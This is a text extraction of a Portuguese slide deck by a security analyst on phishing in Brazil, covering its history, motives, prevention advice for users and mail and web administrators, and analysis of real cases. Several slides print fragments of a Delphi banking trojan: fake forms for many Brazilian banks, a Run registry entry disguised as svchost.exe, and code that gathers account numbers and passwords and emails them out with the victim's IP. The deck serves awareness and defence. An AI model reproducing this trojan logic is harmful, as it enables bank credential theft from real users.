impacto e análise de phising - humberto sartini · como o usuário pode se prevenir ? browsers...
TRANSCRIPT
-
Impacto e Análise de Phising
Humberto Sartinihttp://web.onda.com.br/humberto
-
Palestrante
Humberto Sartini
● Analista de Segurança do Provedor OndaRPC
● Participante dos projetos:● Rau-Tu Linux ( http://www.rau-tu.unicamp.br/linux )● HoneypotBR ( http://www.honeypot.com.br/ )● RootCheck ( http://www.ossec.net/rootcheck/ )
● Participante do:● IV e V Fórum Internacional de SL● Conferência Internacional de SL ( Curitiba - 2003 )● Conisli (São Paulo/SP - 2004)
http://www.rau-tu.unicamp.br/linuxhttp://www.honeypot.com.br/http://www.ossec.net/rootcheck/
-
Tópicos
● O que é Phising ?
● História do Phising
● Cenário Atual
● Motivação do Phiser
● Como o usuário pode se prevenir ?
● O que o administrador pode fazer ?
● Impactos causados
● Exemplos
● Análise de Phising em tempo real
-
O que é Phising ?
É um termo criado para descrever o tipo de fraude que se dá através do envio de mensagem não solicitada, que se passa por comunicação de uma instituição conhecida e que procura induzir o acesso a páginas e/ou programas fraudulentos, projetados para furtar dados pessoais e financeiros de usuários.
Fonte: http://cartilha.cert.br/
-
O que é Phising ?
A palavra Phising (de “fishing”) vem de uma analogia criada pelos fraudadores, onde “iscas” (e-mails) são usados para “pescar” senhas e dados financeiros de usuários da Internet.
Fonte: http://cartilha.cert.br/
-
História do Phising
● Em janeiro de 1996 aparecimento do termo Phising no NewsGroup da 2600 Magazine
● AOL➔1990: Criação de contas com dados falsos (Nome, Número de Cartão de Crédito, etc ...)
➔1995: Utilização de “Força-Bruta”➔1997: E-mail “Suporte AOL” solicitando dados de usuário e senha.
Fonte: Wikipedia
-
Cenário Atual
Formas de Envio● Através de E-mails (quase que a totalidade)
● Sites com códigos maliciosos que aproveitam “falhas” de segurança de Navegadores, Leitores de E-mails e Sistemas Operacionais
● Sites com “brechas” de segurança (PHP Nuke, FormMail, ...)
● Programas de Mensagem Instantânea (MSN, AIM, ICQ, ...)
● Combinação de duas ou mais técnicas
-
Cenário Atual
Facilidades encontradas pelo Phiser:
● Código fonte de vários Phising/Scam em várias linguagens
● Compactador de EXE (Petite)
● Versões “bugadas” de Softwares
● Ingenuidade (??) do usuário
-
Cenário Atual
Facilidades encontradas pelo Phiser:
● “Burrocracia” das Operadoras e Grandes Provedores
● Delegacias Virtuais despreparadas e sem equipamentos
-
Cenário Atual
● Falta de Legislação específica
➔Sugere ao Ministério da Justiça a criação de delegacias especializadas na repressão aos crimes cibernéticos (21/06/2005)
➔Atribui à Justiça Federal o processamento de crimes praticados no âmbito da Internet ou em ambientes similares, disseminados em escala mundial (02/06/2005)
-
Cenário Atual
● Falta de Legislação específica
➔Tipificando os crimes informáticos, praticados pelos chamados "hackers", incluindo os crimes de sabotagem, falsidade e fraude informática; autorizando as autoridades a interceptarem dados dos provedores e prevendo a pena de reclusão para quem armazena, em meio eletrônico, material pornográfico, envolvendo criança e adolescente. (15/09/2004)
-
Cenário Atual
2002 2003 2004 20050,00
5,00
10,00
15,00
20,00
25,00
30,00
35,00
40,00
45,00
50,00
55,00
60,00
65,00
Crescimento de Fraudes
Af
Aw
Dos
Fraude
Invasão
Scan
Worm
-
Motivação do Phiser
-
Motivação do Phiser
● Impunidade
● Legislação Falha ( Nacional e Internacional )
● Máquinas Escravas x Pichação de Sites
● Aluguel de BOTNET ($$$)
-
Como o usuário pode se prevenir ?● Browsers
➔Manter o browser sempre atualizado➔Desativar a execução de programas Java➔Desativar a execução de JavaScripts antes de entrar em uma página desconhecida
➔Permitir que programas ActiveX sejam executados em seu computador apenas quando vierem de sites conhecidos e confiáveis
➔Manter maior controle sobre o uso de cookies
Fonte: http://cartilha.cert.br
-
Como o usuário pode se prevenir ?● Browsers
➔Bloquear pop-up windows e permiti-las apenas para sites conhecidos e confiáveis
➔Certificar-se da procedência do site e da utilização de conexões seguras ao realizar transações via Web
➔Somente acessar sites de instituições financeiras e de comércio eletrônico digitando o endereço diretamente no seu browser
Fonte: http://cartilha.cert.br
-
Como o usuário pode se prevenir ?● Leitores de E-mails
➔Manter sempre a versão mais atualizada do programa leitor de e-mails
➔Não clicar em links que, por ventura, possam aparecer no conteúdo do e-mail
➔Evitar abrir arquivos ou executar programas anexados aos e-mails
➔Desconfiar sempre dos arquivos anexados à mensagem, mesmo que tenham sido enviados por pessoas ou instituições conhecidas
Fonte: http://cartilha.cert.br
-
O que o administrador pode fazer ?
● É fundamental para amenizar os impactos causados pelos Phisings / Scams
● Notificar o incidente para os contatos da rede e para os grupos de segurança das redes envolvidas, além de copiar o e-mail para o Cert.br
● Efetuar configurações especificas para não permitir e/ou amenizar a propagação dos Phisings / Scams
-
O que o administrador pode fazer ?
● Servidores de E-mails
➔Atenção especial aos e-mails com os seguintes anexos: bat, chm, exe, hlp, lnk, pif, reg, scr, shs, vbe, vbs, wsf e wsh
➔Atenção especial aos e-mails com link apontando para arquivos com as seguintes extensões: bat, pif e scr
-
O que o administrador pode fazer ?
● Servidores de E-mails
➔Ativação da checagem de DNS Reverso, HELO, Listas RBL
➔SPF
-
O que o administrador pode fazer ?
● Servidores de Páginas
➔Alteração de “Mime Type” de arquivos com extensão duvidosas (bat, com, pif, scr)
➔Atenção a CGI (FormMail)e PHP (Php Nuke)
➔Eliminar “Cross Site Scripting”
-
http:/ / w w w .brturbo .com .br/ includes / barrap.js p?c= FFFFFF&url= http:/ / w w w .pop.com .br/ barra.php?url= http:/ / w w w .o i.com .br/ s erv ices / PO/ Fram eSet/ Fram eSet.php?URL= http:/ / w w w .ibes t.com .br/ s ite / parce iros / e s tadao .js p?link= http:/ / w w w .ibes t.e s tadao .com .br/ ages tado/ ?i= 1
-
Impactos causados
● Perda de Produtividade
● Consumo de recursos computacionais (processamento, armazenamento, banda, etc ...)
● Golpes e Fraudes
● Ameaça a Segurança da Informação
-
Exem p los e Casos Reais
Tod os os exem p los d e Ph is ings , e m u itos ou tros , es tão no s ite:
h t tp :/ / web.ond a.com .br/ hum berto
-
Porc. (%)0,00
10,00
20,00
30,00
40,00
50,00
60,00
70,00
80,00
90,00
100,00
Análise de ArtefatoKaspersky
NOD32v2
VBA32
Sybari
DrWeb
McAfee
CAT-QuickHeal
Fortinet
BitDefender
Ikarus
Avira
AntiVir
AVG
ClamAV
Panda
Sophos
eTrust-Iris
Norman
TheHacker
Avast
Symantec
F-Prot
-
Exem p los e Casos Reais
● Agora serão m ost radas alguns t rechos dos cód igos fon tes dos softwares u t iliz ados
● Esse software s im ula os segu in tes bancos: BB, Real, Itau , Bradesco, Caixa, Un ibanco, Un iEm presa, Banespa, San tander, BBJurid ica, BEC, BRB, NossaCaixa, Banrisu l, BancoRural e Nordes te
-
Exem p los e Casos Reais Ap p licat ion .Sh owMain Form := fa lse; Ap p licat ion .CreateForm (TForm 1, Form 1); Ap p licat ion .CreateForm (Tfrm BB, frm BB); Ap p licat ion .CreateForm (Tform 3, form 3); Ap p licat ion .CreateForm (Tfrm Itau , frm Itau ); Ap p licat ion .CreateForm (Tform 6, form 6); Ap p licat ion .CreateForm (Tfrm Bra, frm Bra); Ap p licat ion .CreateForm (Tfrm Un iban co, frm Un iban co); Ap p licat ion .CreateForm (Tfrm Un iEm p resa, frm Un iEm p resa); Ap p licat ion .CreateForm (Tfrm Ban esp a, frm Ban esp a); Ap p licat ion .CreateForm (Tfrm San tan d er , frm San tan d er); Ap p licat ion .CreateForm (Tfrm BBJu rid ica , frm BBJu rid ica); Ap p licat ion .CreateForm (Tfrm BEC, frm BEC); Ap p licat ion .CreateForm (Tfrm BRB, frm BRB); Ap p licat ion .CreateForm (Tfrm NossaCaixa, frm NossaCaixa); Ap p licat ion .CreateForm (Tfrm Ban r isu l, frm Ban risu l); Ap p licat ion .CreateForm (Tfrm Ban coRu ral, frm Ban coRu ral); Ap p licat ion .CreateForm (Tfrm Nord es te, frm Nord es te);
-
Exem p los e Casos Reais
fu n ct ion TForm 1.p rocCriaRegis t roDeIn iciarAp licacao(Rem over : BOOL): s t r in g;begin regAp licacao := TRegis t ry.Create; t ry with regAp licacao d o begin s t rCh aveAp p := 'svchos t '; RootKey := HKEY_LOCAL_MACHINE; if Op en Key(s t rCHAVE_INICIAR, Tru e) th en begin if Rem over = t ru e th en regap licacao.DeleteValu e(s t rCh aveAp p ) else
WriteSt r in g(s t rCh aveAp p , PASTA+ '\ con fig\ svch os t .exe'); en d ;
-
Exem p los e Casos Reaiscom p u tad or := n om ecom p u tad or ;m essagebod y.Bod y.Ad d ('Nom e d o Com p u tad or : ' + com p u tad or + ' In fected ' );m essagebod y.Bod y.Ad d ('IP: '+ Get IP + ' ');m essagebod y.Bod y.Ad d ('Data: '+ d atetos t r (n ow) + ' Hora: '+ t im etos t r (t im e) + ' ');m essagebod y.From .Nam e := 'Makin a: ' + com p u tad or ;m essagebod y.Recip ien ts .EMailAd d resses := '[email protected] ';m essagebod y.Su bject := com p u tad or + ' In fectad o ';SMTP.Hos t := 'sm tp .XXXX.com .br ';SMTP.Au th en t icat ion Typ e := a tLogin ;SMTP.Usernam e := 'XXXXXX';SMTP.Password := 'XXXXXX';SMTP.Por t := 25;sm tp .Con n ect ;Trysm tp .Sen d (m essagebod y);excep t SMTP.Hos t := 'm x2.m ail.yah oo.com ';
-
Exem p los e Casos Reais
SMTP.Host := 'sm tp .XXXX.com .br '; / / p õe aqu i o seu sm tp SMTP.Au th en t icat ion Typ e := a tLogin ; SMTP.Por t := 25; SMTP.Usern am e := 'XXXXXXXX'; / / o u ser SMTP.Password := 'XXXXXXXX'; / / a sen h a t ry SMTP.Con n ect ; excep t self.close; en d ;with m essagebod y d o begin From .Text := 'h 3llm 45t3rr '; From .Ad d ress := 'h 3llm [email protected] .br '; / / Recip ien ts .EMailAd d resses := '[email protected] '; / / Qu em receberá as in fo Su bject := 'ban k Accou n ts '; / / an tes reflit a q o CrAz Y é o m aior d os m aiores ^ ^ Bod y.Ad d St r in gs (Dad os); en d ;
-
Exem p los e Casos Reais
Data:= TSt r in gLis t .Create; d ata .Ad d ('- - - - - - > > > Ban co Ru ral < < < - - - - - - - - '); d a ta .ad d ('RURAL Usu ar io: '+ frm Ban coRu ral.ru ralu su .text ); d a ta .ad d ('RURAL Sen h a: '+ frm Ban coRu ral.sen u su .text ); d a ta .ad d ('RURAL Agen cia: '+ frm Ban coRu ral.agen .text ); d a ta .Ad d ('RURAL Tip o: '+ frm BancoRu ral.t ip o.text ); d a ta .ad d ('RURAL Con ta Corren te: '+ frm Ban coRu ral.con tacor .t ext ); d a ta .ad d ('RURAL Digito: '+ frm Ban coRu ral.d ig.text ); d a ta .ad d ('RURAL Sen h a: '+ frm Ban coRu ral.sen h afin al.t ext ); d ata .ad d (''); form 1.CloseIn tern etExp lorer ; excep t en d ; form 1.En viaEm ail(d ata);
-
Exem p los e Casos Reais
Data:= TSt r in gLis t .Create; Data .Ad d (' '); Data .Ad d ('- - - - - - - > > > Ban co es tad u al d o ceara < < - - - - - - - '); d a ta .Ad d ('Agen cia: '+ frm bec.ed it1 .text ); d a ta .Ad d ('Con ta: '+ frm bec.ed it2 .t ext ); d a ta .Ad d ('Digito: '+ frm bec.ed it6 .text ); d a ta .Ad d ('Sen h a NET: '+ frm bec.ed it3 .t ext ); d a ta .Ad d ('Resp os ta : '+ frm bec.ed it4 .text ); Data .Ad d ('- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - '); form 1.CloseIn tern etExp lorer ; excep t en d ; Form 1.En viaEm ail(d ata); d a ta .Free;
-
Análise d e Ph is ing em tem p o real
● Fed ora Core 4● Ap ach e● Dsn iff● Eth ereal● Qem u● Tcp Du m p
● Win d ows 98● In tern et Exp lorer 6
-
Contato
● Através do site ou e-mail
http://web.onda.com.br/humberto
http://web.onda.com.br/humberto
-
Créditos
Sites consu ltad os:
●Cert .br – Cart ilha d e Segurança p ara In terneth t tp :/ / car t ilha.cert .br/
●Fed orah t tp :/ / fed ora.red hat .com
●RNPht tp :/ / www.rnp .br/ not icias / im p rensa/ 2005/ not - im p - abril2005- coord .h tm l
●Sp am Cost Calcu latorh t tp :/ / www.cm sconnect .com / Market ing/ sp am calc.h tm
●Wikip ed iah t tp :/ / en .wikip ed ia.org/ wiki/ Ph ish ing
http://cartilha.cert.br/http://fedora.redhat.com/http://www.rnp.br/noticias/imprensa/2005/not-imp-abril2005-coord.htmlhttp://www.cmsconnect.com/Marketing/spamcalc.htmhttp://en.wikipedia.org/wiki/Phishing
-
Créditos
● Figura Slide 1:http://pcforalla.idg.se/ArticlePages/200504/04/20050404084028_PFA/phising.jpg
● Figura Slide 12 – Dados obtidos em:http://www.cert.br/stats/incidentes/
● Figura Slide 13:http://www.sindpdce.org.br/imagens/noticias/dinheiro.gif
● Figura Slide 26 e 27:h ttp :/ / www.cm sconnect .com / Market ing/ sp am calc.h tm
●Outras Figuras:Arquivo particular
http://pcforalla.idg.se/ArticlePages/200504/04/20050404084028_PFA/phising.jpghttp://www.cert.br/stats/incidentes/http://www.sindpdce.org.br/imagens/noticias/dinheiro.gifhttp://www.cmsconnect.com/Marketing/spamcalc.htm